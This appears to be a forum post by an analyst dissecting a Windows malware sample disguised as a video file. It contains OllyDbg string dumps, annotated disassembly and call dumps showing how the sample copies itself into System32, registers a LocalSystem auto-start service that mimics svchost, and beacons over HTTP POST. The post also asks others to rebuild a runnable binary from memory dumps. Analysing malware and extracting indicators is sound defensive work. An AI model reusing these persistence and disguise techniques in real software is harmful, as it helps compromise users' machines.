Ah, looks quite cute — it's fscking around with services: it installs itself as an auto-start Windows service for persistence (see the CopyFileA / CreateServiceA calls further down).
Some of the strings, dumped after the sample decrypted them at runtime (they are not visible in the file on disk). Worth noting in this list: the service name "CbEvtSvc" with a binary path of "%SystemRoot%\System32\CbEvtSvc.exe -k netsvcs", which mimics svchost's "-k netsvcs" command line to blend in; an HTTP POST beacon to ldrctl/ldrctl.php with the body format "geo=%s&os=%d&ver=%S&idx=%s&user=%S" (the "ver" string pushed just before it is "1.0.4") and a fixed User-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" — both usable as network indicators; a value named "Opt" under SYSTEM\CurrentControlSet\Services\CbEvtSvc (presumably its stored config); and "SeLoadDriverPrivilege", which suggests it may also load a driver at some point.
Code:
Text strings referenced in watchmov:.text
Address    Disassembly                               Text string
00401000   MOV     EAX, 1                            (Initial CPU selection)
0040104D   MOV     DWORD PTR SS:[ESP+14], watchmov.  ASCII "CbEvtSvc"
004010CA   PUSH    watchmov.00410C18                 UNICODE "-k"
004010D9   PUSH    watchmov.00410C20                 UNICODE "netsvcs"
0040110D   PUSH    watchmov.00410C18                 UNICODE "-k"
0040111C   PUSH    watchmov.00410C30                 UNICODE "console"
00401BE5   MOV     ECX, watchmov.00410E2C            ASCII "
"
00401FA4   PUSH    watchmov.00410DB0                 UNICODE "user"
00401FB1   PUSH    watchmov.00410DBC                 UNICODE "1.0.4"
00401FB8   PUSH    watchmov.00410DC8                 ASCII "geo=%s&os=%d&ver=%S&idx=%s&user=%S"
00402102   PUSH    watchmov.00410DEC                 ASCII "%s&ioctl=%d&data=%s
"
00402281   PUSH    watchmov.00410E04                 ASCII "D7EB6085-E70A-4f5a-9921-E6BD244A8C17"
0040240C   PUSH    watchmov.00410E30                 UNICODE "User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
004024A0   PUSH    watchmov.00410EB0                 UNICODE "ldrctl/ldrctl.php"
004024A5   PUSH    watchmov.00410ED4                 UNICODE "POST"
0040250A   PUSH    watchmov.00410EE0                 UNICODE "Connection: Close
Content-Type: application/x-www-form-urlencoded
"
00402516   PUSH    watchmov.00410EE0                 UNICODE "Connection: Close
Content-Type: application/x-www-form-urlencoded
"
00402E0E   ASCII   ";"",0
0040352F   PUSH    watchmov.00410F6C                 ASCII "SYSTEM\CurrentControlSet\Services\CbEvtSvc"
00403572   PUSH    watchmov.00410F98                 ASCII "Opt"
0040358E   PUSH    watchmov.00410F98                 ASCII "Opt"
004035C0   PUSH    watchmov.00410F98                 ASCII "Opt"
00403687   PUSH    watchmov.00410F6C                 ASCII "SYSTEM\CurrentControlSet\Services\CbEvtSvc"
004036B1   PUSH    watchmov.00410F98                 ASCII "Opt"
004036D2   PUSH    watchmov.00410F98                 ASCII "Opt"
00403722   PUSH    watchmov.00410F98                 ASCII "Opt"
004037AD   PUSH    watchmov.00410F9C                 ASCII "%s-%x
"
00403909   PUSH    watchmov.00410FA4                 ASCII "%s\%d.exe"
004039CA   PUSH    watchmov.00410E04                 ASCII "D7EB6085-E70A-4f5a-9921-E6BD244A8C17"
00403F33   PUSH    watchmov.00410FB8                 ASCII "CbEvtSvc.exe"
00403FF7   PUSH    watchmov.00410FC8                 ASCII "%SystemRoot%\System32\CbEvtSvc.exe -k netsvcs"
00404007   PUSH    watchmov.00410C0C                 ASCII "CbEvtSvc"
0040400C   PUSH    watchmov.00410C0C                 ASCII "CbEvtSvc"
0040411F   PUSH    watchmov.00410C0C                 ASCII "CbEvtSvc"
00404256   PUSH    watchmov.00410FF8                 ASCII "SeLoadDriverPrivilege"
004042F6   PUSH    watchmov.00410FF8                 ASCII "SeLoadDriverPrivilege"
00404BE1   MOV     EAX, watchmov.0040F26C            ASCII "Unknown exception"
004065A3   PUSH    watchmov.0040F324                 ASCII ".mixcrt"
00406601   PUSH    watchmov.0040F33C                 ASCII "KERNEL32.DLL"
0040661B   PUSH    watchmov.0040F32C                 ASCII "EncodePointer"
00406678   PUSH    watchmov.0040F33C                 ASCII "KERNEL32.DLL"
00406692   PUSH    watchmov.0040F34C                 ASCII "DecodePointer"
0040676A   PUSH    watchmov.0040F33C                 ASCII "KERNEL32.DLL"
00406795   PUSH    watchmov.0040F32C                 ASCII "EncodePointer"
004067AB   PUSH    watchmov.0040F34C                 ASCII "DecodePointer"
00406A37   PUSH    watchmov.0040F33C                 ASCII "KERNEL32.DLL"
00406A58   PUSH    watchmov.0040F37C                 ASCII "FlsAlloc"
00406A60   PUSH    watchmov.0040F370                 ASCII "FlsGetValue"
00406A6D   PUSH    watchmov.0040F364                 ASCII "FlsSetValue"
00406A7A   PUSH    watchmov.0040F35C                 ASCII "FlsFree"
00408EAC   PUSH    watchmov.0040F494                 ASCII "mscoree.dll"
00408EBB   PUSH    watchmov.0040F484                 ASCII "CorExitProcess"
004091FF   PUSH    watchmov.0040FA40                 ASCII "Runtime Error!
Program: "
00409247   PUSH    watchmov.0040FA28                 ASCII "<program name unknown>"
0040928C   PUSH    watchmov.0040FA24                 ASCII "..."
004092B4   PUSH    watchmov.0040FA20                 ASCII "
"
004092FB   PUSH    watchmov.0040F9F8                 ASCII "Microsoft Visual C++ Runtime Library"
0040BFF7   PUSH    watchmov.004103BC                 ASCII "kernel32.dll"
0040C006   PUSH    watchmov.00410394                 ASCII "InitializeCriticalSectionAndSpinCount"
0040C548   PUSH    watchmov.00410B4C                 ASCII "USER32.DLL"
0040C563   PUSH    watchmov.00410B40                 ASCII "MessageBoxA"
0040C579   MOV     DWORD PTR SS:[ESP], watchmov.004  ASCII "GetActiveWindow"
0040C58E   MOV     DWORD PTR SS:[ESP], watchmov.004  ASCII "GetLastActivePopup"
0040C5CA   PUSH    watchmov.00410B00                 ASCII "GetUserObjectInformationA"
0040C5E2   PUSH    watchmov.00410AE8                 ASCII "GetProcessWindowStation"
0040D70F   PUSH    watchmov.00410B98                 ASCII "CONOUT$"
0040DC86   PUSH    watchmov.00410BC4                 ASCII "string too long"
0040DD17   PUSH    watchmov.00410BD4                 ASCII "invalid string position"
0040EB5C   MOV     DWORD PTR SS:[EBP+8], watchmov.0  ASCII "bad exception"
 
WinMain is here (00401010, reached from the CRT startup at the OEP shown further down). It parses the command line and branches on argv: "-k netsvcs" runs as a service via StartServiceCtrlDispatcherA, "-k console" takes a MessageBoxA path, and a call with fewer than three arguments goes to 00403EB0, which looks like the install routine:
Code:
; WinMain (00401010), reached from the CRT startup at the OEP (0040557A).
; Control flow as read from this listing:
;   - builds argv via GetCommandLineW/CommandLineToArgvW and installs
;     00401000 as the top-level exception filter;
;   - requires GetVersionExA to succeed with dwPlatformId == 2
;     (VER_PLATFORM_WIN32_NT) and 004042C0 to return non-zero, retrying
;     once after calling 00404230 (both routines are outside this listing);
;   - argc > 2, "-k netsvcs": runs as service "CbEvtSvc" through
;     StartServiceCtrlDispatcherA, then waits on the handle at [414B64];
;   - argc > 2, "-k console": calls 00403BB0, then MessageBoxA and 00403DB0;
;   - argc <= 2: calls 00403EB0 and returns its result -- presumably the
;     installer, since the CopyFileA/CreateServiceA calls in the dumps
;     below return to 00403F8F/00404018, just past it (unconfirmed).
; Return value (EAX = EBX): 0x32 by default, 0x641 if the dispatcher call
; fails, or whatever 00403EB0 returned.  Stdcall with 4 args (RETN 10).
00401010           /$  55            PUSH    EBP
00401011           |.  8BEC          MOV     EBP, ESP
00401013           |.  83E4 F8       AND     ESP, FFFFFFF8
00401016           |.  81EC B4000000 SUB     ESP, 0B4
; [413034] XOR ESP stored at [ESP+B0]: looks like the MSVC /GS stack
; cookie; the matching check is at 0040115C before the return.
0040101C           |.  A1 34304100   MOV     EAX, DWORD PTR DS:[413034]
00401021           |.  33C4          XOR     EAX, ESP
00401023           |.  898424 B00000>MOV     DWORD PTR SS:[ESP+B0], EAX       ;  watchmov.0040557A
0040102A           |.  53            PUSH    EBX                              ;  watchmov.00414EE4
0040102B           |.  56            PUSH    ESI
0040102C           |.  57            PUSH    EDI                              ;  watchmov.00413600
; argc lives at [ESP+C]; EBX (the eventual return value) starts at 0x32.
; ESI = argv (freed with LocalFree at the common exit).
0040102D           |.  8D4424 0C     LEA     EAX, DWORD PTR SS:[ESP+C]
00401031           |.  50            PUSH    EAX                              ; /pArgc = watchmov.0040557A
00401032           |.  BB 32000000   MOV     EBX, 32                          ; |
00401037           |.  FF15 BCF04000 CALL    NEAR DWORD PTR DS:[40F0BC]       ; |[GetCommandLineW
0040103D           |.  50            PUSH    EAX                              ; |CmdLine = "?P??.?????A??A??A??A??A??A??????A??????A??????A????E????????????????AA??A?????????A"
0040103E           |.  FF15 BCF14000 CALL    NEAR DWORD PTR DS:[40F1BC]       ; \CommandLineToArgvW
00401044           |.  8BF0          MOV     ESI, EAX                         ;  watchmov.0040557A
00401046           |.  33C0          XOR     EAX, EAX                         ;  watchmov.0040557A
; Installs 00401000 as the unhandled-exception filter.  While the filter
; pointer is on the stack it also fills a SERVICE_TABLE_ENTRYA[2] there:
; name "CbEvtSvc", a ServiceMain pointer (truncated by Olly below), then
; a NULL,NULL terminator.  That table is what 004010EA dispatches.
00401048           |.  68 00104000   PUSH    watchmov.00401000                ; /pTopLevelFilter = watchmov.00401000
0040104D           |.  C74424 14 0C0>MOV     DWORD PTR SS:[ESP+14], watchmov.>; |ASCII "CbEvtSvc"
00401055           |.  C74424 18 104>MOV     DWORD PTR SS:[ESP+18], watchmov.>; |
0040105D           |.  894424 1C     MOV     DWORD PTR SS:[ESP+1C], EAX       ; |watchmov.0040557A
00401061           |.  894424 20     MOV     DWORD PTR SS:[ESP+20], EAX       ; |watchmov.0040557A
00401065           |.  FF15 B4F04000 CALL    NEAR DWORD PTR DS:[40F0B4]       ; \SetUnhandledExceptionFilter
; OSVERSIONINFOA at [ESP+20]; dwOSVersionInfoSize = 0x94 (sizeof OSVERSIONINFOA).
; On failure: GetLastError, then leave with EBX still 0x32.
0040106B           |.  8D4C24 20     LEA     ECX, DWORD PTR SS:[ESP+20]
0040106F           |.  51            PUSH    ECX                              ; /pVersionInformation = kernel32.7C809B49
00401070           |.  C74424 24 940>MOV     DWORD PTR SS:[ESP+24], 94        ; |
00401078           |.  FF15 C4F04000 CALL    NEAR DWORD PTR DS:[40F0C4]       ; \GetVersionExA
0040107E           |.  85C0          TEST    EAX, EAX                         ;  watchmov.0040557A
00401080           |.  75 0B         JNZ     SHORT watchmov.0040108D
00401082           |.  FF15 B8F04000 CALL    NEAR DWORD PTR DS:[40F0B8]       ;  ntdll.RtlGetLastWin32Error
00401088           |.  E9 BC000000   JMP     watchmov.00401149
; [ESP+30] is dwPlatformId (struct offset 0x10); must equal 2
; (VER_PLATFORM_WIN32_NT), otherwise leave.
0040108D           |>  BF 02000000   MOV     EDI, 2
00401092           |.  397C24 30     CMP     DWORD PTR SS:[ESP+30], EDI       ;  watchmov.00413600
00401096           |.  0F85 AD000000 JNZ     watchmov.00401149
; 004042C0 is not in this listing.  If it returns 0, call 00404230 and
; try 004042C0 once more; a second 0 means leave.  The SeLoadDriverPrivilege
; strings are referenced at 00404256/004042F6, so 00404230 may be a
; privilege-adjustment routine -- unconfirmed.
0040109C           |.  E8 1F320000   CALL    watchmov.004042C0
004010A1           |.  85C0          TEST    EAX, EAX                         ;  watchmov.0040557A
004010A3           |.  75 12         JNZ     SHORT watchmov.004010B7
004010A5           |.  E8 86310000   CALL    watchmov.00404230
004010AA           |.  E8 11320000   CALL    watchmov.004042C0
004010AF           |.  85C0          TEST    EAX, EAX                         ;  watchmov.0040557A
004010B1           |.  0F84 92000000 JE      watchmov.00401149
; argc <= 2 (signed compare) -> 00401142, the install path.
004010B7           |>  397C24 0C     CMP     DWORD PTR SS:[ESP+C], EDI        ;  watchmov.00413600
004010BB           |.  0F8E 81000000 JLE     watchmov.00401142
; Service mode: argv[1] == "-k" and argv[2] == "netsvcs", case-insensitive.
; (Matches the "-k netsvcs" in the registered service's binary path.)
004010C1           |.  8B56 04       MOV     EDX, DWORD PTR DS:[ESI+4]
004010C4           |.  8B3D B0F04000 MOV     EDI, DWORD PTR DS:[40F0B0]       ;  kernel32.lstrcmpiW
004010CA           |.  68 180C4100   PUSH    watchmov.00410C18                ; /String2 = "-k"
004010CF           |.  52            PUSH    EDX                              ; |String1 = "??"
004010D0           |.  FFD7          CALL    NEAR EDI                         ; \lstrcmpiW
004010D2           |.  85C0          TEST    EAX, EAX                         ;  watchmov.0040557A
004010D4           |.  75 34         JNZ     SHORT watchmov.0040110A
004010D6           |.  8B46 08       MOV     EAX, DWORD PTR DS:[ESI+8]
004010D9           |.  68 200C4100   PUSH    watchmov.00410C20                ; /String2 = "netsvcs"
004010DE           |.  50            PUSH    EAX                              ; |String1 = "?P??.?????A??A??A??A??A??A??????A??????A??????A????E????????????????AA??A?????????A"
004010DF           |.  FFD7          CALL    NEAR EDI                         ; \lstrcmpiW
004010E1           |.  85C0          TEST    EAX, EAX                         ;  watchmov.0040557A
004010E3           |.  75 25         JNZ     SHORT watchmov.0040110A
; Hands the SERVICE_TABLE_ENTRYA at [ESP+10] to the SCM; on failure the
; return value becomes 0x641 and we leave.
004010E5           |.  8D4C24 10     LEA     ECX, DWORD PTR SS:[ESP+10]
004010E9           |.  51            PUSH    ECX                              ; /pServiceTable = kernel32.7C809B49
004010EA           |.  FF15 3CF04000 CALL    NEAR DWORD PTR DS:[40F03C]       ; \StartServiceCtrlDispatcherA
004010F0           |.  85C0          TEST    EAX, EAX                         ;  watchmov.0040557A
004010F2           |.  75 07         JNZ     SHORT watchmov.004010FB
004010F4           |.  BB 41060000   MOV     EBX, 641
004010F9           |.  EB 4E         JMP     SHORT watchmov.00401149
; Dispatcher returned: block forever on the handle stored at [414B64]
; (presumably created/signalled by the service code -- not visible here),
; then fall into the "-k console" check below.
004010FB           |>  8B15 644B4100 MOV     EDX, DWORD PTR DS:[414B64]
00401101           |.  6A FF         PUSH    -1                               ; /Timeout = INFINITE
00401103           |.  52            PUSH    EDX                              ; |hObject = 7C90E4F4
00401104           |.  FF15 70F04000 CALL    NEAR DWORD PTR DS:[40F070]       ; \WaitForSingleObject
; Console mode: argv[1] == "-k" and argv[2] == "console".
0040110A           |>  8B46 04       MOV     EAX, DWORD PTR DS:[ESI+4]
0040110D           |.  68 180C4100   PUSH    watchmov.00410C18                ; /String2 = "-k"
00401112           |.  50            PUSH    EAX                              ; |String1 = "?P??.?????A??A??A??A??A??A??????A??????A??????A????E????????????????AA??A?????????A"
00401113           |.  FFD7          CALL    NEAR EDI                         ; \lstrcmpiW
00401115           |.  85C0          TEST    EAX, EAX                         ;  watchmov.0040557A
00401117           |.  75 30         JNZ     SHORT watchmov.00401149
00401119           |.  8B4E 08       MOV     ECX, DWORD PTR DS:[ESI+8]
0040111C           |.  68 300C4100   PUSH    watchmov.00410C30                ; /String2 = "console"
00401121           |.  51            PUSH    ECX                              ; |String1 = "????.??????????????????0????."
00401122           |.  FFD7          CALL    NEAR EDI                         ; \lstrcmpiW
00401124           |.  85C0          TEST    EAX, EAX                         ;  watchmov.0040557A
00401126           |.  75 21         JNZ     SHORT watchmov.00401149
; 00403BB0 non-zero -> leave.  Otherwise MessageBoxA is called with all
; four arguments NULL (EAX is 0 here; the values Olly shows are stale),
; then 00403DB0.  Neither routine is in this listing.
00401128           |.  E8 832A0000   CALL    watchmov.00403BB0
0040112D           |.  85C0          TEST    EAX, EAX                         ;  watchmov.0040557A
0040112F           |.  75 18         JNZ     SHORT watchmov.00401149
00401131           |.  50            PUSH    EAX                              ; /Style = A|70|MB_DEFBUTTON2|MB_SYSTEMMODAL|404400
00401132           |.  50            PUSH    EAX                              ; |Title = "è?P"
00401133           |.  50            PUSH    EAX                              ; |Text = "è?P"
00401134           |.  50            PUSH    EAX                              ; |hOwner = 0040557A
00401135           |.  FF15 C4F14000 CALL    NEAR DWORD PTR DS:[40F1C4]       ; \MessageBoxA
0040113B           |.  E8 702C0000   CALL    watchmov.00403DB0
00401140           |.  EB 07         JMP     SHORT watchmov.00401149
; argc <= 2: run 00403EB0 and return whatever it returns.
00401142           |>  E8 692D0000   CALL    watchmov.00403EB0
00401147           |.  8BD8          MOV     EBX, EAX                         ;  watchmov.0040557A
; Common exit: free argv, restore callee-saved regs, EAX = EBX, then the
; stack-cookie check (XOR ECX,ESP + CALL 004046F8 looks like
; __security_check_cookie) before returning.
00401149           |>  56            PUSH    ESI                              ; /hMemory = FFFFFFEC
0040114A           |.  FF15 C0F04000 CALL    NEAR DWORD PTR DS:[40F0C0]       ; \LocalFree
00401150           |.  8B8C24 BC0000>MOV     ECX, DWORD PTR SS:[ESP+BC]
00401157           |.  5F            POP     EDI                              ;  kernel32.7C817067
00401158           |.  5E            POP     ESI                              ;  kernel32.7C817067
00401159           |.  8BC3          MOV     EAX, EBX                         ;  watchmov.00414EE4
0040115B           |.  5B            POP     EBX                              ;  kernel32.7C817067
0040115C           |.  33CC          XOR     ECX, ESP
0040115E           |.  E8 95350000   CALL    watchmov.004046F8
00401163           |.  8BE5          MOV     ESP, EBP
00401165           |.  5D            POP     EBP                              ;  kernel32.7C817067
00401166           \.  C2 1000       RETN    10
 
Some piecemeal dumps taken while stopped at the OEP. Can someone try to piece this together into a real, runnable PE file? Note that the code calls its imports through an IAT inside the image (e.g. CALL DWORD PTR DS:[40F0BC] -> GetCommandLineW in WinMain above), so a memory dump taken here will need its import table rebuilt before it runs — and only run it in an isolated VM, since it installs itself as an auto-start service (see below).
The OEP (0040557A) is here:
Code:
0040557A           |.  E8 3F500000   CALL    watchmov.0040A5BE
0040557F           \.^ E9 16FEFFFF   JMP     watchmov.0040539A
00405584           />  55            PUSH    EBP
00405585           |.  8BEC          MOV     EBP, ESP
 
Edit:
This fscker copies itself into the system directory as CbEvtSvc.exe (CopyFileA with FailIfExists = FALSE, so any existing file of that name is silently overwritten):
Code:
0012FC38   00403F8F  /CALL to CopyFileA from watchmov.00403F89
0012FC3C   0012FD58  |ExistingFileName = "C:\Documents and Settings\Cp m\Desktop\watchmovie[1].mpg\watchmovie.mpg.exe"
0012FC40   0012FC50  |NewFileName = "C:\WINDOWS\system32\CbEvtSvc.exe"
0012FC44   00000000  \FailIfExists = FALSE
 
and then starts the service. First, fc confirms the dropped CbEvtSvc.exe is byte-identical to the original sample, so a hash of either file works as an indicator:
Code:
C:\>fc "c:\Documents and Settings\Cp m\Desktop\watchmovie[1].mpg\watchmovie.mpg.
exe" c:\WINDOWS\system32\CbEvtSvc.exe
Comparing files C:\DOCUMENTS AND SETTINGS\CP M\DESKTOP\WATCHMOVIE[1].MPG\watchmo
vie.mpg.exe and C:\WINDOWS\SYSTEM32\CBEVTSVC.EXE
FC: no differences encountered
and then creates the service: auto-start, own process, binary path "%SystemRoot%\System32\CbEvtSvc.exe -k netsvcs" (mimicking svchost's command line), and ServiceStartName = NULL, which means it runs as LocalSystem:
0012FC08   00404018  /CALL to CreateServiceA from watchmov.00404012
0012FC0C   00148718  |hManager = 00148718
0012FC10   00410C0C  |ServiceName = "CbEvtSvc"
0012FC14   00410C0C  |DisplayName = "CbEvtSvc"
0012FC18   000F003F  |DesiredAccess = SERVICE_QUERY_CONFIG|SERVICE_CHANGE_CONFIG|SERVICE_QUERY_STATUS|SERVICE_ENUMERATE_DEPENDENTS|SERVICE_START|SERVICE_STOP|F0000
0012FC1C   00000010  |ServiceType = SERVICE_WIN32_OWN_PROCESS
0012FC20   00000002  |StartType = SERVICE_AUTO_START
0012FC24   00000001  |ErrorControl = SERVICE_ERROR_NORMAL
0012FC28   00410FC8  |BinaryPathName = "%SystemRoot%\System32\CbEvtSvc.exe -k netsvcs"
0012FC2C   00000000  |LoadOrderGroup = NULL
0012FC30   00000000  |pTagId = NULL
0012FC34   00000000  |pDependencies = NULL
0012FC38   00000000  |ServiceStartName = NULL
0012FC3C   00000000  \Password = NULL